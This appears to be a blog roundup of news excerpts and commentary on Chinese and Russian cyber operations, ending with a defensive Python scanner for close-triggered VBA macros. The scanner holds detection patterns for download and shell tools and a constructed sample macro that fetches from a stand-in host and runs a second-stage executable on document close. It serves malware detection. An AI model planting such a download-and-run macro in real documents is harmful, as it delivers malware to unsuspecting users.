CNBC reports on Australia’s Department of Defence prohibiting the popular Chinese chat app WeChat from being used on its network assets:

Messaging and e-payment app WeChat has become the latest Chinese technology to be banned by an overseas military on security grounds, with Australia instructing its armed forces not to use it.

The country’s defence department said the service did not meet its standards, although it did not directly link the ban to security concerns.

“Software and applications that do not meet Defence standards will not be authorised for use on Defence networks and mobile devices,” the country’s defence department said in an email statement. “Defence has a strict policy concerning the use of social media on its networks and mobile devices. Defence allows very few applications on Defence mobile devices. WeChat has not been authorised for use.”

Australia is part of the Five Eyes, so it should come as no surprise to see it banning Chinese internet technology. It simply boils down to a matter of trust, and trust is hard to extend when China is wreaking havoc all over the world, even if it has been a bit quiet lately.

Ars Technica reports on what may be one of the largest malware-driven currency mining operations, which has generated more than $3 million in cryptocurrency so far:

The unknown criminals generated the windfall over the past 18 months. The campaign has mainly exploited critical vulnerabilities on Windows computers and then, once it gains control over them, installs a modified version of XMRig, an open-source application that mines the digital coin known as Monero. While the group has used a variety of mining services, it has continued to dump the proceeds into a single wallet. As of last week, the wallet had received payouts of almost 10,829 Monero, which, at current valuations, are worth more than $3.4 million.

“The perpetrator, allegedly of Chinese origin, has been running the XMRig miner on many versions of Windows and has already secured him over $3 million worth of Monero cryptocurrency,” researchers at security firm Check Point wrote in a blog post. “As if that wasn’t enough though, he has now upped his game by targeting the powerful Jenkins CI server, giving him the capacity to generate even more coins.”

The Jenkins Continuous Integration server is open-source software written in Java for deploying and automating all kinds of tasks. With more than 1 million users, it’s one of the most widely used open-source automation servers. In January, independent researcher Mikail Tunç estimated that as many as 20 percent of Jenkins servers are misconfigured in ways that make serious hacks possible. The compromises cause slower performance and potential denial-of-service failures on compromised machines.

That is an unreal amount of money generated from such an insignificant amount of work.

CNBC is reporting that the six top US intelligence agency directors are cautioning Americans against purchasing phones from Chinese telecom giant Huawei:

The six — including the heads of the CIA, FBI, NSA and the director of national intelligence — first expressed their distrust of Apple-rival Huawei and fellow Chinese telecom company ZTE in reference to public servants and state agencies.

When prompted during the hearing, all six indicated they would not recommend private citizens use products from the Chinese companies.

“We’re deeply concerned about the risks of allowing any company or entity that is beholden to foreign governments that don’t share our values to gain positions of power inside our telecommunications networks,” FBI Director Chris Wray testified.

“That provides the capacity to exert pressure or control over our telecommunications infrastructure,” Wray said. “It provides the capacity to maliciously modify or steal information. And it provides the capacity to conduct undetected espionage.”

Huawei, much like ZTE, is so close to the Chinese government that it almost appears to be a quasi-government agency, even though both companies would claim otherwise. However, the same could be said of US telecom giants Verizon and AT&T. Both have such a cozy relationship with the US government that they can pretty much do the government’s bidding without any fear of reprisal.

On the one hand, it is understandable for the US intelligence agencies to recommend avoiding Chinese technology providers. On the other hand, what happens when governments across the globe start recommending their citizens avoid US technology giants like Apple, Google, and others?

This seems like a slippery slope to travel.

TechCrunch reports:

Intel notified some of its customers of the security flaws in its processors, dubbed Spectre and Meltdown, but left out the U.S. government as part of that. Some of the companies Intel notified included Chinese technology companies, though the report suggests there is no evidence that any information was misused. An Intel spokesperson said that the company wasn’t able to tell everyone it planned because the news was made public earlier than expected.

So the real questions are: did China inform Russia of these vulnerabilities, and has Russia created tools to leverage these exploits? Why would Intel hide this information from the United States government?

This goes back to something I am adamantly against: withholding news of vulnerabilities of this nature so the intelligence communities can stockpile and leverage internally developed exploit kits to their so-called advantage.

The New York Times reports on the global desire of nations to be able to protect themselves from highly sophisticated actors such as China, Russia, Iran, North Korea, and others:

Securing the world against cyberattacks — from nations, criminal groups, vandals and teenagers — will be on the agenda when many of the world’s top leaders gather at the World Economic Forum in Davos, Switzerland, this week. As usual, there is a flurry of reports, and entrepreneurs will declare they have technological solutions at hand. But the fact remains that the major powers of the world have been unable to come up with a viable means of deterring the most damaging attacks. It still takes too long to formally identify the culprits, and the responses, as Mr. Bossert indicated, are insufficient.

Efforts to establish “norms of behavior” got a promising start, but are now falling apart. No one can even agree on when an act of aggression in cyberspace amounts to an act of war. The Pentagon, in its first nuclear strategy review since President Trump took office, is even proposing to use the threat of unleashing nuclear weapons against a country or group that delivered a devastating cyberattack against the critical infrastructure of the United States or its allies. But that doesn’t help with the problem of everyday attacks.

The most talented state sponsors of attacks — mostly Russia, China, Iran and North Korea — have carefully calibrated their operations in cyberspace to achieve their strategic aims while avoiding a real shooting war. So far they have succeeded. While there have been indictments of Iranian and Chinese hackers in major strikes on the United States, they have never seen the inside of an American courtroom.

Geopolitical cyber attacks are the new cold war.

Infosecurity Group reports on Russian and Chinese cyber operations capabilities:

Russia and China are the two nation-states with the most concerning capabilities, the report said. Both are considered to possess the highest levels of technical sophistication, reserved for only a select set of countries. The actors can engage in full-spectrum operations, utilizing the breadth of capabilities available in cyber-operations in concert with other elements of state power, including conventional military force and foreign intelligence services with global reach. The capabilities they have are thus alarmingly advanced, according to Flashpoint: “Kinetic and cyber-attacks conducted by the threat actor(s) have the potential to cause complete paralysis and/or destruction of critical systems and infrastructure. Such attacks have the capacity to result in significant destruction of property and/or loss of life. Under such circumstances, regular business operations and/or government functions cease and data confidentiality, integrity, and availability are completely compromised for extended periods,” the report noted.

For Russia’s part, its state-sponsored hacking arms (such as Fancy Bear) remain highly active, capable and influential, the report said, with retaliatory and cyber-influence activity expecting to ramp up as it is increasingly isolated from the West following election interference and information operations against Western democracies.

“Moreover, Moscow continues to crack down on digital dissent and segregate itself from the global internet,” the report found. “The result is a country moving quickly toward a unique model of domestic information control via technical control of internet infrastructure, services and data, a lack of online anonymity, and censorship.”

As for China, it too remains an active and highly capable actor in cyberspace on multiple levels, although state-sponsored activity against Western targets has dropped off a bit. The report cautions decision makers not to grow complacent.

China and Russia are two of the most sophisticated countries in terms of cyber operations capabilities. However, the two countries leverage cyber for diametrically opposed reasons. Russia is interested in destabilizing the globe, while China primarily uses cyber either to prop up its own economic goals or for espionage.

There are so many unintended consequences of artificial intelligence that I feel as if we are nowhere near the tip of the iceberg. Consider how Chinese company iFlyTek is leveraging AI in multiple industrial and commercial applications while also maintaining a close working relationship with the Chinese government. There are many dark ways the government may use the data that companies like iFlyTek can provide:

As China tests the frontiers of artificial intelligence, iFlyTek serves as a compelling example of both the country’s sci-fi ambitions and the technology’s darker dystopian possibilities.

The Chinese company uses sophisticated A.I. to power image and voice recognition systems that can help doctors with their diagnoses, aid teachers in grading tests and let drivers control their cars with their voices. Even some global companies are impressed: Delphi, a major American auto supplier, offers iFlyTek’s technology to carmakers in China, while Volkswagen plans to build the Chinese company’s speech recognition technology into many of its cars in China next year.

At the same time, iFlyTek hosts a laboratory to develop voice surveillance capabilities for China’s domestic security forces. In an October report, a human rights group said the company was helping the authorities compile a biometric voice database of Chinese citizens that could be used to track activists and others.

Those tight ties with the government could give iFlyTek and other Chinese companies an edge in an emerging new field. China’s financial support and its loosely enforced and untested privacy laws give Chinese companies considerable resources and access to voices, faces and other biometric data in vast quantities, which could help them develop their technologies, experts say.

Colour me unsurprised to hear that a Chinese drone manufacturer is sharing videos of US critical infrastructure and law enforcement with the Chinese government:

DJI, one of the leading manufacturers of consumer and commercial drones sold in the United States, has been accused by US officials of “Providing U.S. critical infrastructure and law enforcement data to the Chinese government.”

DJI notes, for example, that it does not force its customers to upload their flight videos to the company’s servers, and that it has access to only those videos that its customers have actively sent to the firm’s equipment.

While China-based DJI is a dominant player in both the commercial and consumer drone markets in North America, the government accusation focuses on commercial drones – not consumer drones; it is not clear whether that is because the government does not believe DJI is sharing consumer drone data, or because commercial drone data sharing is likely a far bigger national security risk.

The current controversy over DJI comes just months after a similar controversy arose with US government officials accusing cybersecurity product vendor, Kaspersky Lab, of providing data to the Russian government.

The memo notes that “The Chinese government is likely using information acquired from DJI systems as a way to target assets they are planning to purchase. For instance, a large family-owned wine producer in California purchased DJI UAS to survey its vineyards and monitor grape production. Soon afterwards, Chinese companies began purchasing vineyards in the same area. According to the SOI, it appeared the companies were able to use DJI data to their own benefit and profit.”

Bottom line: do not buy anything from DJI ever again.

The US has charged three Chinese nationals with hacking, even though Presidents Obama and Xi agreed in a 2015 deal to cease stealing intellectual property from each other:

The charges being brought in Pittsburgh allege that the hackers stole intellectual property from several companies, including Trimble, a maker of navigation systems; Siemens, a German technology company with major operations in the US; and Moody’s Analytics.

US investigators have concluded that the three charged by the US attorney in Pittsburgh were working for a Chinese intelligence contractor, the sources briefed on the investigation say.

A 2015 deal between then-President Barack Obama and Chinese President Xi Jinping prohibits the US and China from stealing intellectual property for the purpose of giving advantage to domestic companies.

Obama administration officials had touted the Obama-Xi agreement, as well as 2014 Justice Department charges against members of the Chinese People’s Liberation Army for commercial espionage, for reducing some of the Chinese cyberactivity against companies in the US. But the 2015 Obama-Xi deal was met with skepticism inside the US agencies whose job it is to guard against Chinese cyberactivity targeting US companies.

In the waning months of the Obama administration, intelligence officials briefed senior White House officials on information showing that the Chinese cyberattacks were back to levels previously seen, sources familiar with the matter told CNN. Early in the Trump administration, US intelligence officials briefed senior officials, including the President and vice president, as well as advisers Jared Kushner and Steve Bannon.

Did anyone actually think China would honor this deal? It was likely more symbolic than an actual agreement.

China is close to codifying a controversial new cyber security law that most foreign businesses are going to have a tough time swallowing:

The draft law would require companies to “comply with social and business ethics” and “accept supervision by both government and the public,” according to the state news agency Xinhua.

It would also stipulate that Chinese citizens’ personal information and other data collected in China must be housed in the country.

A new provision would also order Beijing to “monitor and deal with threats from abroad to protect the information infrastructure from attack, intrusion, disturbance or damage.”

This should not come as a surprise, and I wonder what makes it so controversial in the first place. Looked at from the obvious Chinese perspective, many highly popular cyber security businesses are from the United States. As far as China is concerned, any American business is tied up with the American government, and thus merely an extension of the NSA, CIA, and other intelligence agencies. This law allows China to maintain some semblance of control of the cyber security being provided in their country.

Of course foreign businesses are going to complain. This law is being codified in public, with the Chinese government basically admitting bias. Contrast that with how the United States handles the same issue: there is no official written law on the books, but rather a de facto ban against Chinese cyber security firms.

Raytheon wins $1 billion cyber security contract to battle attacks on US agencies:

The contract, one of the largest civilian cybersecurity orders in years, would help more than 100 federal civilian agencies protect their networks against malicious hackers, and it comes after the Office of Personnel Management suffered one of the most damaging breaches in history.

The OPM recently said that hackers stole the fingerprints of 5.6 million people, far more than previously thought. The attacks are believed to have affected more than 21 million former and current government employees, whose personal information, including Social Security numbers and information used in security clearances, may have been compromised.

The Obama administration has said it has made cybersecurity a top priority, and Congress has pushed to expand the nation’s defenses and make them more robust. The Pentagon is also taking steps to develop ways to fend off hackers, who often only have to find one crack in a network, while defenders have to guard the entire wall.

At a hearing on cybersecurity Tuesday, Sen. John McCain (R-Ariz.) said that in the past year, Iran, North Korea, China and Russia have all launched cyber­attacks on the United States. And he said the rate of the attacks has increased, “crippling or severely disrupting networks across the government and private sector and compromising sensitive national security information.”

He added: “Far more needs to be done to develop the necessary capabilities to deter attacks, fight and win in cyberspace.”

According to John McAfee, cyberwar[sic] is here, and China is the enemy:

We have to get a clue. We are in the early stages of a cyberwar. As a candidate for President of the very nation under attack, I would be remiss in my duties if I did not shed light on our reality.

I am going to make the following prediction:

On September 25, when Xi Jinping meets President Obama, we will not have a single concrete response to the war that has been declared on us by the Chinese. By “concrete” I mean economic sanctions that take place on the 25th, or other immediate, visible actions. Our president is smart enough to know that the Chinese will merely laugh at any threat of “future” actions, such as “next week we are going to…”

The Chinese have been involved in diplomatic relations for 5,000 years. The U.S. has only existed for less than 250 years. Guess which nation has the advantage here. Any announcement that does not include “starting today, no Chinese cargo ship will be allowed in any U S. port,” or something of similar magnitude, will be seen by the Chinese as confirmation of our idiocy.

If this sounds extreme, then wake up. We are at war.

Well, there you have it. Since Mr. John McAfee, presidential candidate, thinks so, I guess the US government needs to get right on it!

Another week, another round of bad news about the OPM breach. This time we learn that the fingerprints of 5.6 million US government employees were exfiltrated by the ostensibly Chinese hackers:

The attack on the agency, which is the main custodian of the government’s most important personnel records, has been attributed to China by American intelligence agencies, but it is unclear exactly what group or organization engineered it. Before Wednesday, the agency had said that it lost only 1.1 million sets of fingerprints among the records of roughly 22 million individuals that were compromised.

“Federal experts believe that, as of now, the ability to misuse fingerprint data is limited,” the agency said in a written statement. But clearly the uses are growing as biometrics are used more frequently to assure identity, in secure government facilities and even on personal iPhones.

The working assumption of investigators is that China is building a huge database of information about American officials or contractors who may end up entering China or doing business with it. Fingerprints could become a significant part of that effort: While a Social Security number or a password can be changed, fingerprints cannot.

Customs and immigration officials frequently fingerprint incoming travelers; millions of fingerprints in a Chinese database would help track the true identities of Americans entering the country.

“I am assuming there will be people we simply can’t send to China,” a senior intelligence official said this summer, before the most recent revelation. “That’s only part of the damage.”

The agency said that an “interagency working group,” with help from the F.B.I., the Department of Homeland Security and the intelligence agencies, “will review the potential ways adversaries could misuse fingerprint data now and in the future.”

The OPM breach is going to be studied for the next few years and will become the premier case study on how not to conduct cyber security. It is amazing they still have not increased their cyber defense capabilities since this all came to light a few short months ago.

Even though Russia has highly advanced cyber attack capabilities, this does not mean it is immune to operations designed to breach its networks. It would seem China may have conducted a cyber attack against the Russian military:

“There is a world market for classified data of any time,” said Epstein. “There are documented cases in the past where private hackers hacked into various institutions and then sold the data to nation states. The lines are increasingly blurred in the world of cybersecurity.”

The attack starts with a well-written Russian-language email that seems to come from someone else in the targeted military division or an analyst section from the same group of the military, he said.

It comes with an attached document, a Microsoft Word file with a published article about the history of military testing in Russia.

“It’s a decoy document,” said Epstein. “You double-click on it, you open it, you read it, you think, ‘Ah, that was kind of interesting.’ Then you close it and you don’t think about it again. But when it closes, it activates a macro, and the macro triggers a secondary file to take action, which is to download a third file, which is the nasty stuff.”

That’s when the malware takes over the computer and everything the user has access to, the attackers now have access to.

“Any anti-virus program wouldn’t see a virus in the document because there’s no virus in the document,” he said. “And the trigger on closing is a common anti-sandboxing technique because most sandboxes check for triggering when documents are opened, not when they are closed.”

This is a fairly standard, yet highly advanced, technique for evading endpoint anti-virus and sandbox analysis. This is why layered defenses must extend beyond the network and be implemented at the endpoint as well. Tools such as application whitelisting, host intrusion prevention, and desktop firewalls, used together, can greatly reduce the chance of this kind of malware executing successfully.
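As an added example (not code from the article or from the researchers quoted), here is a small Python triage check for extracted VBA source that treats close-triggered auto-exec procedures with the same suspicion as open-triggered ones, since an open-only sandbox run reports nothing for the decoy described above. The trigger lists and indicator patterns are my own selection, and both sample macros are constructed.

```python
"""Scan extracted VBA source for the pattern described above: an auto-exec
procedure that fires on document close and chains to a download or shell.
Input is VBA text as a tool such as olevba would extract it; the two sample
modules at the bottom are constructed for this example."""
import re

# Auto-exec entry points honoured by Word and Excel, split by when they fire.
# Sandboxes that only open the document never trigger the second group.
OPEN_TRIGGERS = {"autoopen", "document_open", "auto_open", "workbook_open"}
CLOSE_TRIGGERS = {"autoclose", "document_close", "auto_close", "workbook_beforeclose"}

# Second-stage indicators: common ways a macro fetches or runs another file.
INDICATORS = {
    "MSXML2.XMLHTTP": r"MSXML2\.(?:Server)?XMLHTTP",
    "URLDownloadToFile": r"URLDownloadToFile",
    "WinHttpRequest": r"WinHttp\.WinHttpRequest",
    "WScript.Shell": r"WScript\.Shell",
    "Shell": r"(?<![.\w])Shell\b",   # the Shell statement, not WScript.Shell
    "powershell": r"powershell",
}

# Procedure declarations: optional scope, Sub/Function, then the name.
PROC_RE = re.compile(r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)",
                     re.IGNORECASE | re.MULTILINE)


def analyse_vba(source: str) -> dict:
    """Classify one VBA module; returns its triggers, indicators and a verdict."""
    procs = PROC_RE.findall(source)
    open_hits = sorted(p for p in procs if p.lower() in OPEN_TRIGGERS)
    close_hits = sorted(p for p in procs if p.lower() in CLOSE_TRIGGERS)
    hits = sorted(name for name, pat in INDICATORS.items()
                  if re.search(pat, source, re.IGNORECASE))
    auto_exec = bool(open_hits or close_hits)
    if auto_exec and hits:
        verdict = "suspicious"
    elif auto_exec:
        verdict = "auto-exec"
    elif hits:
        verdict = "indicators-only"
    else:
        verdict = "clean"
    return {
        "open_triggers": open_hits,
        "close_triggers": close_hits,
        # True when the only auto-exec path is on close: an open-only sandbox
        # run would report nothing, which is exactly the evasion described.
        "sandbox_evasion": bool(close_hits) and not open_hits,
        "indicators": hits,
        "verdict": verdict,
    }


# Constructed sample in the shape of the decoy described above: nothing runs
# on open; the close handler reaches out for a second stage and runs it.
SAMPLE_MACRO = """
Attribute VB_Name = "ThisDocument"
Private Sub Document_Close()
    Dim http As Object
    Set http = CreateObject("MSXML2.XMLHTTP")
    http.Open "GET", "http://stage2.example.invalid/", False
    Shell "second_stage.exe"
End Sub
"""

# Constructed benign module: a user macro with no auto-exec entry point.
BENIGN_MACRO = """
Sub FormatTable()
    Selection.Tables(1).AutoFormat
End Sub
"""

if __name__ == "__main__":
    for label, src in (("decoy", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        print(label, analyse_vba(src))
```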

Who here wonders if this attack was actually perpetrated by the United States but made to appear as if China is responsible?

Another day, another news item about state-backed, China-based cyber attacks. This time Trend Micro has released a comprehensive report detailing how China-based cyber attacks on US military targets are “Advanced, Persistent And Ongoing”:

In its blog announcing the paper, Trend Micro stated that “Operation Iron Tiger is a targeted attack campaign discovered to have stolen trillions of bytes of data from defense contractors in the U.S., including stolen emails, intellectual property, and strategic planning documents.” The report further details that targets of Iron Tiger included military defense contractors, intelligence agencies, FBI-based partners, and the U.S. government. The private entities were tech-based government contractors in the electric, aerospace, intelligence, telecommunications, energy, and nuclear engineering industries.

Iron Tiger was observed exfiltrating up to 58GB worth of data from a single target, more than was stolen in the Sony attack. It could have potentially stolen up to terabytes of data in total, Trend Micro reports. It is highly environmentally adaptive and otherwise sophisticated and well organized, potentially merely an arm of a larger, multi-teamed operation with various targets.

China is convincingly Iron Tiger’s home base

The primary situs of China as the operatives’ home base was convincingly evidenced by the facts that the operatives used virtual private network (VPN) servers that only accepted China-based registrants, used Chinese file names and passwords, and operated from China-registered domains, according to the report. Some of Iron Tiger’s actions were also attributed to an individual physically located in China.